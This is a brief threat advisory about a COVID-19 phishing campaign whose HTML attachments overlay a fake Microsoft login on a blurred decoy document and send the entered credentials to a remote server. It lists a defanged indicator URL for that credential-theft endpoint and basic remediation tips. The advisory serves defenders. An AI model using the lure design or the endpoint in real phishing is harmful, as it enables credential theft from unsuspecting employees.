Rewterz Threat Advisory – ICS: Siemens RUGGEDCOM, SCALANCE, SIMATIC, SINEMA
May 13, 2020Rewterz Threat Advisory – ICS: OSIsoft PI System Multiple Vulnerabilities
May 13, 2020Rewterz Threat Advisory – ICS: Siemens RUGGEDCOM, SCALANCE, SIMATIC, SINEMA
May 13, 2020Rewterz Threat Advisory – ICS: OSIsoft PI System Multiple Vulnerabilities
May 13, 2020Severity
Medium
Analysis Summary
Plenty of COVID-19 themed phishing emails have been observed since the outbreak started. A specific campaign claiming that an employee tested positive for the virus and updated guidelines are being provided to prevent further infections. The email bodies vary slightly but the subject lines have the same pattern and all have HTML files attached. Opening the HTML file displays a blurred document overlaid with a Microsoft login box in the browser. The blurred decoy document contains COVID-19 related information, increasing its perceived legitimacy. Attempting to login leads to the exfiltration of the provided credentials to a remote URL. The researchers note that the style sheets for the HTML file are hosted on a compromised site and the blurred background image is hosted on a legitimate image hosting site.
Impact
- Credentials theft
- Exposure of sensitive data.
Indicators of Compromise
URL
hxxp[:]//tokai-lm.jp/style/89887cc/5789n.php?98709087-87634423
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious about emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.